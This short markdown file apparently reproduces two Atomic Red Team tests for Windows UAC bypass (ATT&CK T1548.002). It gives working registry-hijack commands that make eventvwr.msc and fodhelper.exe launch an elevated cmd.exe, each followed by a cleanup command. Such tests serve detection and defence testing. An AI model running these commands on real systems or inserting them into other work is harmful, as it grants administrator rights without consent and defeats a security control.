################T1548.002.md################

##Atomic Test #1 - Bypass UAC using Event Viewer (cmd)

```reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f```
```cmd.exe /c eventvwr.msc```

#Borrado
```reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1```

```PAUSE```

##Atomic Test #3 - Bypass UAC using Fodhelper

```reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f```
```reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f```
```fodhelper.exe```

#Borrado
```reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1```

```PAUSE```